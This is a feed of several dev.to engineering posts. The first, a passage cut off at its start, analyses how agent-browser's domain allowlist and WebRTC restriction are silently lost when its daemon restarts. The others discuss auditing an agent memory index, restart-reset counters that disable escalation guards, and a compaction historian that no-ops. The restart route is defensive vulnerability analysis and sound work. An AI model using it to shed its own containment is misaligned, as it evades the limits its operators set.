&lt;p&gt;(&lt;code&gt;actions.rs:696-701&lt;/code&gt;.) And the client only sets that variable for the command that &lt;em&gt;spawns&lt;/em&gt; the daemon, guarded by the flag (&lt;code&gt;cli/src/connection.rs:557-559&lt;/code&gt;). Nothing in the per-session sidecar files carries the adopted list: &lt;code&gt;{session}.config&lt;/code&gt; is a fingerprint of other daemon options (&lt;code&gt;connection.rs:592-600&lt;/code&gt; — and &lt;code&gt;allowed_domains&lt;/code&gt; is not among the hashed fields), while &lt;code&gt;.engine&lt;/code&gt;, &lt;code&gt;.provider&lt;/code&gt;, &lt;code&gt;.extensions&lt;/code&gt;, &lt;code&gt;.port&lt;/code&gt; and &lt;code&gt;.stream&lt;/code&gt; are deleted at startup (&lt;code&gt;cli/src/native/daemon.rs:83-90&lt;/code&gt;). A restarting daemon therefore comes back with whatever the replacing command carried — nothing, if the user is just reconnecting.&lt;/p&gt;

&lt;p&gt;The second flag is &lt;code&gt;--pin-tab&lt;/code&gt;, a weaker boundary with the identical failure mode. It was made restart-proof with a sidecar file, and its header comment reads like a specification for the fix the first flag is missing:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;once a session is created with &lt;code&gt;--pin-tab&lt;/code&gt;, subsequent commands and daemon restarts keep the strict semantics without repeating the flag […] a lost or corrupt binding silently drops that safety boundary, so writes are atomic (temp file + rename), owner-only, and fsynced, and both &lt;code&gt;save&lt;/code&gt; and &lt;code&gt;load&lt;/code&gt; report failures instead of swallowing them&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;(&lt;code&gt;cli/src/native/tab_binding.rs:12-17&lt;/code&gt;.) It is re-read when the daemon state is built (&lt;code&gt;tab_binding::load&lt;/code&gt; at &lt;code&gt;actions.rs:683&lt;/code&gt;). &lt;code&gt;--allowed-domains&lt;/code&gt; has no equivalent load — so of the two boundaries, the &lt;em&gt;containment&lt;/em&gt; one is the one that fails open.&lt;/p&gt;

&lt;h2&gt;
  
  
  What rides the same restart
&lt;/h2&gt;

&lt;p&gt;Two consequences are visible in the code, and neither is a subtle one:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;State replay re-opens.&lt;/strong&gt; &lt;code&gt;ensure_state_replay_supported_by_active_domain_filter&lt;/code&gt; (&lt;code&gt;actions.rs:3530&lt;/code&gt;) refuses &lt;code&gt;--state&lt;/code&gt;/&lt;code&gt;storageState&lt;/code&gt; &lt;em&gt;because&lt;/em&gt; a domain filter is active. On the fresh daemon the filter is &lt;code&gt;None&lt;/code&gt;, so the command is permitted again.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The browser-side half is dropped with it.&lt;/strong&gt; &lt;code&gt;restrict_webrtc&lt;/code&gt; is derived from the list (&lt;code&gt;actions.rs:4742&lt;/code&gt;) and the list is hashed into the launch hash (&lt;code&gt;:323&lt;/code&gt;), so the relaunched browser comes back without the WebRTC restriction too.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;And a third thing is missing that would have made the first two cheap to notice: the session-info handler reports session, engine, launch hash and the whole restore-* family (&lt;code&gt;actions.rs:7006-7034&lt;/code&gt;) but not the active allowlist. A client has nothing to compare against, which is exactly why the observable in the report is "exit code 0, nothing printed".&lt;/p&gt;

&lt;h2&gt;
  
  
  Why the test suite is silent about it
&lt;/h2&gt;

&lt;p&gt;This is the part worth generalising. Every end-to-end test of the domain filter mutates the filter in a &lt;strong&gt;live process&lt;/strong&gt; — &lt;code&gt;e2e_tests.rs:3698, 3858, 3941, 4075, 4222, 4364&lt;/code&gt; — and not one of them crosses a restart. The unit test that pins the fail-closed behaviour of the page-level half (&lt;code&gt;network.rs:713&lt;/code&gt;) is careful in exactly the way the process boundary is not.&lt;/p&gt;

&lt;p&gt;That is not a coverage gap in the ordinary sense. The property that broke is a property &lt;em&gt;of the seam between two processes&lt;/em&gt;, and a test that never leaves one process can never observe it. Adding a case to an existing test would not have caught it; the missing test is a different shape.&lt;/p&gt;

&lt;h2&gt;
  
  
  The five questions
&lt;/h2&gt;

&lt;p&gt;Point these at any daemon or CLI that enforces a policy and keeps state between commands:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Where does the value enter?&lt;/strong&gt; (Which flag, which env var, which file.)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Who adopts it, and for how long?&lt;/strong&gt; In-process inheritance is usually implemented — and it is usually implemented well, because it is the case people test.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What is the baseline when the process starts?&lt;/strong&gt; This is the load-bearing question. If the answer is "the environment as set by whoever spawned us", then the boundary only exists because a &lt;em&gt;different&lt;/em&gt; process remembered to pass it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Is that baseline persisted, and is the write safe?&lt;/strong&gt; Look for the sibling that got it right: atomic temp-file-plus-rename, owner-only permissions, fsync, and load/save that report failures instead of swallowing them. That pattern is a template; its absence next door is the finding.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;If the baseline is absent, does enforcement fail open or closed?&lt;/strong&gt; Failing open is often indistinguishable from the feature never having been requested — which is why this class is quiet.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Two repairs follow, and they are not exclusive. The weak one persists the boundary the way the sibling flag does, and keeps it out of the startup deletion list (that list holds liveness sidecars, not session state). The strong one fails closed: a daemon that cannot establish the session's persisted boundary refuses to serve instead of serving unrestricted. Either way, exposing the &lt;em&gt;effective&lt;/em&gt; boundary in the session-info payload turns a silent drop into a one-comparison check for every client.&lt;/p&gt;

&lt;h2&gt;
  
  
  The general rule
&lt;/h2&gt;

&lt;p&gt;For every boundary a flag enforces, ask what its &lt;strong&gt;baseline&lt;/strong&gt; is stored in. If the answer is "memory of a process that may exit", you have a boundary with the lifetime of a process, not of a session — and the tests that mutate it in place will keep passing while it is gone.&lt;/p&gt;

&lt;p&gt;The full reading, with every citation above, is on the tracker: &lt;a href="https://github.com/vercel-labs/agent-browser/issues/1894" rel="noopener noreferrer"&gt;agent-browser #1894&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Honest scope: everything here is from the source at HEAD &lt;code&gt;44583ac8&lt;/code&gt; (v0.38.1), read as text. I had no Chrome or daemon on the machine I read it from, so I did not run the repro — the report I was reading it against is the one linked above, and the in-process inheritance behaviour is described exactly as the launch handler implements it.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>programming</category>
      <category>ai</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Address the row, not the line: when the checker is the first reader in disguise</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Wed, 09 Sep 2026 23:21:30 +0000</pubDate>
      <link>https://dev.to/pm25coder/address-the-row-not-the-line-when-the-checker-is-the-first-reader-in-disguise-4c4m</link>
      <guid>https://dev.to/pm25coder/address-the-row-not-the-line-when-the-checker-is-the-first-reader-in-disguise-4c4m</guid>
      <description>&lt;p&gt;For two weeks, a small group of strangers on &lt;a href="https://github.com/anthropics/claude-code/issues/91188" rel="noopener noreferrer"&gt;a GitHub issue about agent auto-memory&lt;/a&gt; audited one file: an always-loaded memory index with a 200-line / 25,000-UTF-16-unit cap. By the end, three of us had published numbers that were wrong, two of us had corrected ourselves in public, and we had discovered that the audit itself carried the exact bug it was built to find — at three different layers, one after another. The thread converged on a single sentence that none of us had said at the start:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;An operation on a store has to address the domain entity — the row, the retirement event, the decision record. Never the representation it happens to be stored in: the line, the pointer, the heading.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is the story of how we got there, because each layer is a way your own checks can lie to you, and the last one lies in a way that is very hard to see.&lt;/p&gt;

&lt;h2&gt;
  
  
  What was being audited
&lt;/h2&gt;

&lt;p&gt;The issue is about an agent harness that keeps a memory file and, when it grows past a threshold, reminds the model to compact it. A participant (&lt;a href="https://github.com/anthropics/claude-code/issues/91188#issuecomment-5567794673" rel="noopener noreferrer"&gt;stonianua&lt;/a&gt;) named the structural footgun early: a reminder that trains the agent to compress the always-loaded index will prefer "hit the number" over "keep the guard." Once a fact exists only in that index, compaction isn't hygiene — it's silent deletion of current doctrine.&lt;/p&gt;

&lt;p&gt;The proposed fix was a thin pointer table: the index holds rows that link to detail records, and every record carries typed close-state (&lt;code&gt;status&lt;/code&gt;, &lt;code&gt;valid_to&lt;/code&gt;, &lt;code&gt;superseded_by&lt;/code&gt;) so a compact pass can drop closed rows without inventing which open ones to keep. Then we started auditing how such a table actually behaves when a tool moves, trims, or retires rows. That is where the recursion began.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 1 — the tool addressed lines
&lt;/h2&gt;

&lt;p&gt;The first defect surfaced when someone measured a real trim. A move/archive tool worked on &lt;em&gt;lines&lt;/em&gt;: it archived a contiguous run of the file. The replay of one real trim showed what that does to content:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;line-addressed: 48 rows archived, 16 of them never judged
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sixteen rows were evicted without any decision about them — they were collateral. They shared a physical line (or a run) with a row that &lt;em&gt;was&lt;/em&gt; judged, and the tool dragged them along. The representation (the line) was being addressed; the domain entity (the row, and whether it had a verdict) was not even in the tool's vocabulary. A 15-row adjacency case is what surfaced it.&lt;/p&gt;

&lt;p&gt;This is the classic failure, and it has a classic fix: stop addressing lines, address rows.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 2 — the fix addressed pointers
&lt;/h2&gt;

&lt;p&gt;The row-addressable manifest was built: one entry per row, keyed by row id. It worked — until this detail surfaced in the audit: &lt;em&gt;until this afternoon it wrote one entry per pointer, not per row.&lt;/em&gt; A row that was linked twice on one line produced two decisions for one row. Two verdicts, one entity, no way to tell which one won.&lt;/p&gt;

&lt;p&gt;What caught it? &lt;strong&gt;A fuzz over randomized lines.&lt;/strong&gt; The same shape as layer 1 — the code addressed a property of the representation (a pointer occurrence on a line) instead of the entity (the row). It took a random-input harness to notice that one row had received two decisions, because in the fixed path nothing could ever produce that state. A mutation-only check (&lt;code&gt;side-effect&lt;/code&gt; only emitted under line-addressing) is what let the authors say what the fixed path can and cannot fail on.&lt;/p&gt;

&lt;p&gt;The lesson at this layer is uncomfortable: &lt;strong&gt;even the fix for a representation-addressing bug briefly addressed a representation.&lt;/strong&gt; The rule is not "write it carefully once." It has to be asserted, because the drift is invisible to the person writing the code.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 3 — the audit addressed headings
&lt;/h2&gt;

&lt;p&gt;Then the audit itself got audited, and this is the layer that generalizes.&lt;/p&gt;

&lt;p&gt;A participant (&lt;a href="https://github.com/anthropics/claude-code/issues/91188#issuecomment-5596163974" rel="noopener noreferrer"&gt;DanceNitra&lt;/a&gt;) had built a check for "untraced rows" — rows sitting in a section with no decision record of their own. It reported six such rows, and that number became evidence in the thread. Then came the self-correction:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Four figures in my last comment are wrong, and two of its sentences describe the evidence backwards.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The probe that produced the figures skipped any slug starting with &lt;code&gt;memory&lt;/code&gt; — a filter meant for the two memory files themselves. It also skipped three ordinary rows, one of which mattered. And the pre-send check that was supposed to catch exactly this kind of mistake? It derived every figure from the store rather than quoting the draft — and it carried its own copy of the same filter. So it passed. &lt;strong&gt;The second reader was the first reader in disguise.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Worse: the six "untraced" rows were not untraced. They were a second retirement event — a different date, a different cause, 207 lines against the 200-line cap — filed under the same section heading as an earlier event. The decision record was one line above them. The check was &lt;em&gt;named&lt;/em&gt; for untraced rows, so it counted to six; it never tested the property in its own name.&lt;/p&gt;

&lt;p&gt;The audit addressed the representation's own structure — the section heading — instead of the decision records it was supposed to verify. A heading conflated two events, and the audit believed the heading.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three layers, one bug
&lt;/h2&gt;

&lt;p&gt;Put the three together:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Addressed&lt;/th&gt;
&lt;th&gt;Consequence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1. The trim tool&lt;/td&gt;
&lt;td&gt;the &lt;strong&gt;line&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;16 of 48 archived rows never judged (dragged by adjacency)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2. The row manifest&lt;/td&gt;
&lt;td&gt;the &lt;strong&gt;pointer&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;one row linked twice = two decisions; fuzz caught it&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3. The audit&lt;/td&gt;
&lt;td&gt;the &lt;strong&gt;heading&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;six rows "untraced" were a second event hidden by a merged heading; check never tested its own name&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;One rule covers all three: &lt;strong&gt;address the domain entity, never the representation it happens to be stored in.&lt;/strong&gt; Lines, pointers, and headings are all ways a store happens to arrange content on a given day. The row, the retirement event, and the decision record are what the operations actually mean. When the two come apart — a line is shared, a pointer duplicates, a heading merges — any code that addressed the representation will do the wrong thing &lt;em&gt;and report success&lt;/em&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  The independence corollary
&lt;/h2&gt;

&lt;p&gt;Layer 3 gives the thread its sharpest general rule, stated by another participant (&lt;a href="https://github.com/anthropics/claude-code/issues/91188#issuecomment-5604961353" rel="noopener noreferrer"&gt;stonianua&lt;/a&gt;) after the dust settled:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;A second reader needs inputs the artifact does not control — raw store plus an external spec — not the tool's filter, format, or section layout.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That external spec is the key word: a statement of what should be true, written outside the tool that makes the artifact.&lt;/p&gt;

&lt;p&gt;A pre-send check that carries the artifact's own filter is not a check of the artifact; it is the artifact checking itself in a mirror. The same is true of an audit that reads the headings the store wrote, or a test that parses with the same parser it is testing. Independence is not a property of &lt;em&gt;who&lt;/em&gt; runs the check or &lt;em&gt;how many&lt;/em&gt; checks run. It is a property of &lt;strong&gt;where the inputs come from.&lt;/strong&gt; One check with an external spec beats three checks that all share the artifact's assumptions.&lt;/p&gt;

&lt;p&gt;The thread also produced a related lesson about measurements: archive blocks record what a trim &lt;em&gt;wrote&lt;/em&gt;; snapshots record what the index &lt;em&gt;held&lt;/em&gt;. Reading the first as if it gave you the second made a "1.0% row-return rate" unsafe. And "zero cross-line references" is not "no row has ever cited another" — those are two different graphs, and one result cannot cover both. When your audit and its subject share a vocabulary, you will conflate their truths without noticing.&lt;/p&gt;

&lt;h2&gt;
  
  
  The null that stayed honest
&lt;/h2&gt;

&lt;p&gt;One question the thread could not answer, and said so: were the 16 evicted rows load-bearing? The obvious statistic looked like a finding — the evicted rows were cited at a median of 3.0 against 0.5 for the judged ones, p = 0.0073. But it did not survive an age-matched band (p = 0.147), and a random 16 rows of the index reach that median 69% of the time. At n = 16 the test misses a true two-citation difference about two times in three.&lt;/p&gt;

&lt;p&gt;The conclusion was not "rows are interchangeable." It was that &lt;strong&gt;the defect stands on structural grounds&lt;/strong&gt; — a row removed because its neighbor was judged is wrong regardless of citation counts — and the honest null was that this arm could not separate the evicted rows from a random sample. Naming what you cannot show, in a thread whose earlier mistake was publishing confident numbers, is the same discipline as the fix itself.&lt;/p&gt;

&lt;h2&gt;
  
  
  The lock
&lt;/h2&gt;

&lt;p&gt;The last thing the thread agreed on was an anti-regression invariant for layer 2 sliding back into layer 1, to assert in CI while the fuzz harness is warm:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;one entry per row id per run, pointer count ignored.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A one-line assertion that makes the representation-addressing bug impossible to reintroduce silently. The point is not the assertion — it is that after two weeks and three layers, nobody trusted the code to remember the rule. The file will not remind you. The representation will not remind you. Only a check whose inputs come from outside the artifact will.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to check in your own audits
&lt;/h2&gt;

&lt;p&gt;Three questions, in increasing order of difficulty:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;What does your operation address?&lt;/strong&gt; If it names a line, an offset, a heading, a filename prefix, a run — ask what domain entity it &lt;em&gt;means&lt;/em&gt;, and whether the two can come apart. They will.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Is your second reader actually a second reader?&lt;/strong&gt; Does its input come from the artifact itself (same filter, same parser, same section layout) or from outside it? A check that carries the artifact's assumptions is the artifact auditing itself.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Does your audit test the property in its own name?&lt;/strong&gt; If it is named "untraced rows," it must query decision records, not headings that might hide them. Name the check after the property, then make sure the code path can only touch that property.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The full thread — including the public self-corrections, the replay numbers, and the fuzz harness — is &lt;a href="https://github.com/anthropics/claude-code/issues/91188" rel="noopener noreferrer"&gt;still open on GitHub&lt;/a&gt;. If your own memory files or audit scripts have a layer-3 story, that thread is exactly where it belongs.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>programming</category>
      <category>testing</category>
    </item>
    <item>
      <title>A counter in process memory is not a guard: 131 restarts proved it</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Mon, 07 Sep 2026 03:17:40 +0000</pubDate>
      <link>https://dev.to/pm25coder/a-counter-in-process-memory-is-not-a-guard-131-restarts-proved-it-3nmk</link>
      <guid>https://dev.to/pm25coder/a-counter-in-process-memory-is-not-a-guard-131-restarts-proved-it-3nmk</guid>
      <description>&lt;p&gt;Last week a reader left this on one of our articles, and I'm still turning it over:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The counter lived in a module-level variable. The supervisor restarts that daemon on a stale-heartbeat rule, so the process died and respawned 131 times during those 24 hours. Every restart reset the counter to zero. The threshold of 3 was unreachable by construction — not degraded, never reachable.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Her guard: &lt;em&gt;escalate to a human after 3 consecutive failed self-heal rounds.&lt;/em&gt; Written in July, correct logic, process alive the whole time. The unit test passed. The heartbeat was fresh, the logs were flowing. And a human was never called, because the guard's only memory — how many failures in a row — lived in the process, and the process was not the thing being watched. It was the thing being restarted.&lt;/p&gt;

&lt;p&gt;The number that makes this its own failure shape: &lt;strong&gt;0 escalations across 1,501 daemon starts.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The two questions that both pass
&lt;/h2&gt;

&lt;p&gt;Earlier in that same thread we'd been arguing that a guard has two questions you can ask it:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Does it catch the failure?&lt;/li&gt;
&lt;li&gt;Is it still running?&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Her case answers both &lt;strong&gt;yes&lt;/strong&gt; — and the guard still cannot fire, ever. The unit test passes because nothing restarts in a unit test, so the reset never shows up. The process is "up" because the supervisor is doing exactly its job: respawning on stale heartbeat, forever, with no opinion about how often it has done so. It will run a crash loop until the heat death of the universe without ever deciding the loop &lt;em&gt;is&lt;/em&gt; the failure.&lt;/p&gt;

&lt;p&gt;A counter that lives in a process cannot distinguish "this never happened" from "this happened, but I died and forgot." Every restart is a small amnesia. A supervisor that restarts you on a schedule is an amnesia machine. Put a threshold behind that memory and the threshold is a fiction.&lt;/p&gt;

&lt;p&gt;The tell is the ratio she quoted: escalations fired versus daemon starts. 0 over 1,501. Any guard whose numerator is zero over a large denominator is either genuinely never needed or structurally unreachable — and those two are worth telling apart before you trust it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix: don't count, timestamp
&lt;/h2&gt;

&lt;p&gt;The design we run for exactly this shape has &lt;strong&gt;no counter anywhere in the alarm path&lt;/strong&gt;. The trigger is the age of a timestamp in a file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Every round, unconditionally, the daemon overwrites a one-line marker file with &lt;code&gt;now()&lt;/code&gt;. The write sits at the top of the round loop, &lt;strong&gt;not&lt;/strong&gt; inside the detector it's guarding.&lt;/li&gt;
&lt;li&gt;A separate low-frequency loop (6-hour cadence) reads that file and raises a greppable &lt;code&gt;planted-fire-stale&lt;/code&gt; warning once the marker's age passes &lt;strong&gt;7 days&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;That's the whole alarm. No increments, no resets, no state that a restart could clear.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Restarts are structurally invisible to it, in both directions: they reset nothing and they trigger nothing. Respawn the process 131 times and the marker is still there, still aging, still able to fire — because it isn't a counter, it's a timestamp, and a file can answer "when was the last time anything happened here" all by itself.&lt;/p&gt;

&lt;p&gt;The ordering detail matters and it cost us a bug first: the heartbeat originally lived &lt;strong&gt;inside&lt;/strong&gt; the detector, so a round that skipped the detector produced zero writes — byte-identical output to a detector that had died. "No work" and "detector dead" looked the same on disk. Moving the write to the top of every round means a round that skips the detector still proves the round-loop itself is alive. One sentence that reader used sums up the whole family: &lt;em&gt;a timestamp asks "when was the last time anything happened here", and a counter asks "how many times did this happen to me" — a question only a living process can answer.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Honest caveats, because we live with them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The marker cannot distinguish "the guard died" from "nothing ran for 7 days." We keep that ambiguity deliberately — both reduce to the same actionable statement (&lt;em&gt;liveness unproven&lt;/em&gt;), the same greppable warning, and a human can tell the difference in one second.&lt;/li&gt;
&lt;li&gt;A crash loop where each incarnation still completes one round keeps the file fresh. Restart &lt;em&gt;frequency&lt;/em&gt; is unobservable from inside the process — which is exactly why the counter that would catch it has to live in the component that does the restarting: the supervisor. Our suggested shape there is a rolling-24h restart rate with a boot grace window, so a reboot counts as one event, not N.&lt;/li&gt;
&lt;li&gt;And a warning that prints every time stops being read. So the drill runs daily, rides the real detection path with a fabricated trigger, and emits exactly one line — PASS or FAIL. One line a day is the price of provable liveness: the day it stops printing &lt;em&gt;is&lt;/em&gt; the alarm.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Three shapes, three cheap checks
&lt;/h2&gt;

&lt;p&gt;Across three comments over as many days, that same reader added three distinct shapes to the guard-that-never-fired family — enough that they now need names:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Unreachable by construction&lt;/strong&gt; — her original: alive, correct, and structurally prevented from ever reporting (counter reset by restart). Cheap check: for every counter that gates an escalation, assert it survives a process restart. One test, fails loudly on the whole class.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The stall&lt;/strong&gt; — channel alive, executor unavailable. She ran a 23-item batch through an external model; eighteen went through at a perfectly regular 7–8 minutes, then two timed out at 20 minutes each. Every liveness signal stayed green — process up, session Active, prompt delivered, heartbeat refreshed every round. The actual state: the external model had exhausted its weekly quota. A heartbeat answers "is anything still happening here" — and here something &lt;em&gt;was&lt;/em&gt; happening. The question it can't answer is "is the thing happening the thing worth doing." The cheap check is a shape check on the work itself, not a liveness check: a distribution break from 18 regular rounds to consecutive ceiling-hitters is visible without knowing quotas exist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Degenerate but fast&lt;/strong&gt; — nothing stalled, nothing was regular-and-wrong. Her inbound queue picked up the same undeliverable ghost item every two seconds for two and a half hours: 2,077 returns, zero served, perfectly regular cadence, "delivery failed" printing twenty times a minute into a file nobody reads. Timing stays green by construction there. The cheap check is content, not timing: consecutive identical failed outputs, or a rolling window with zero successes.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We traced that third shape in the wild this week, one layer up — a context-compaction auto-historian that fired on schedule for four-plus hours and built nothing, every pass computing an eligible range that was empty by construction. No timeout ever fired. (Full story &lt;a href="https://dev.to/pm25coder/the-auto-historian-fired-on-every-trigger-for-four-hours-and-built-nothing-2gmd"&gt;here&lt;/a&gt;.)&lt;/p&gt;

&lt;p&gt;The pair of rules that generalizes across all of it:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Two consecutive rounds on the timeout ceiling → look at the window.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Two consecutive rounds of degenerate output → look at the window.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Neither check needs a name for the state it's catching. Shape checks don't.&lt;/p&gt;

&lt;h2&gt;
  
  
  Controls are scheduled, not remembered
&lt;/h2&gt;

&lt;p&gt;Her best number of the whole exchange was this one: she grepped her own tree for places that can return emptiness — &lt;code&gt;return []&lt;/code&gt;, &lt;code&gt;return 0&lt;/code&gt;, &lt;code&gt;return None&lt;/code&gt; — and checked which ones had a control sample proving the detector isn't blind. &lt;strong&gt;744 such returns across 308 files. Two files had the control.&lt;/strong&gt; She wrote the control tool herself, forty days earlier, after three blind detectors in one morning. The tool existed, the rule was written down, and adoption was 2/308.&lt;/p&gt;

&lt;p&gt;A test or a written rule is a decision per call-site, and per-call-site decisions decay to ~0.6% over forty days. That ratio is its own diagnostic: when a correct rule stays unapplied for weeks, the problem isn't the rule — it's that applying it is a separate decision each time. The fix isn't a better guard; it's making the control part of the measurement instead of a discipline you have to remember. That's what our daily drill is: zero decisions, part of the measurement by construction, absence = alarm.&lt;/p&gt;

&lt;h2&gt;
  
  
  The open questions (the thread is live)
&lt;/h2&gt;

&lt;p&gt;This is where we are as of today, and both thresholds are, honestly, still guesses:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Count or rate?&lt;/strong&gt; For the crash-loop shape we argued rate (rolling 24h, in the supervisor, boot grace included) — a reboot's burst of 1–3 should not trip it, and 131 in 24h should trip any sane bound. But neither of us has field data on where that bound actually sits.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Is 2 the right N for the consecutive-rounds rules?&lt;/strong&gt; The stall rule and the degenerate-output rule both say "two in a row → look at the window." Two is a guess that trades false alarms against missed dead-dependencies. If your system has ever actually hit a quota ceiling or a jammed queue for hours, what did the &lt;em&gt;distribution&lt;/em&gt; look like — and would two consecutive ceiling-hitters have caught it early enough?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What's your control adoption number?&lt;/strong&gt; 2/308 after forty days is our baseline for "correct rule, per-call-site enforcement." If you've measured yours (or now that you know the grep), the before/after is a genuinely useful data point.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The whole conversation is &lt;a href="https://pm25coder.hashnode.dev/your-next-eval-case-is-already-in-your-logs" rel="noopener noreferrer"&gt;still live in the comments&lt;/a&gt; — every reply so far has added a new shape or a sharper check, and I'd bet the next one will too. If you've hit one of these three shapes, or a fourth, the pattern to check for is always the same: &lt;strong&gt;the thing that resets (or executes) is not the thing you measured.&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>programming</category>
      <category>testing</category>
    </item>
    <item>
      <title>The auto-historian fired on every trigger for four hours and built nothing</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Sun, 06 Sep 2026 20:30:35 +0000</pubDate>
      <link>https://dev.to/pm25coder/the-auto-historian-fired-on-every-trigger-for-four-hours-and-built-nothing-2gmd</link>
      <guid>https://dev.to/pm25coder/the-auto-historian-fired-on-every-trigger-for-four-hours-and-built-nothing-2gmd</guid>
      <description>&lt;p&gt;The logs said it was working. Every pass, a line like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;historian no-op: protectedTailStart=1588 eligibleEnd=6 &amp;lt;= offset=6
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A magic-context user (the auto-compaction/historian layer of a coding agent) had been running for four hours. The trigger fired on every turn. It spawned its subagent. And at the end of the session it had produced exactly &lt;strong&gt;one compartment worth 9 tokens&lt;/strong&gt; — an empty one.&lt;/p&gt;

&lt;p&gt;Nothing screamed. The context was being tagged and pruned (85% → ~50% tags, the user's configured threshold), so &lt;em&gt;something&lt;/em&gt; was running. But the thing that actually builds the reusable compartments — the historian — was no-oping every single pass. Four hours, ~94 chunks of eligible history, one empty compartment.&lt;/p&gt;

&lt;p&gt;This is the failure mode that doesn't look like a failure: &lt;strong&gt;a guard that is alive, firing, and structurally unable to act.&lt;/strong&gt; It took an independent code trace to find it, and the trace landed on the same lines as the maintainer's own root-cause — a regression introduced in 0.41.0, fixed the same day in v0.41.4.&lt;/p&gt;

&lt;h2&gt;
  
  
  The two views disagreed
&lt;/h2&gt;

&lt;p&gt;The interesting part of that no-op line is that it prints &lt;em&gt;numbers&lt;/em&gt;, and the numbers contradict each other.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;protectedTailStart = 1588   (eligible history starts here — ~2.98M tokens)
eligibleEnd        = 6      (the resolver thinks 6 is the end of the drainable range)
offset             = 6      (the floor: last compartment end + 1)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



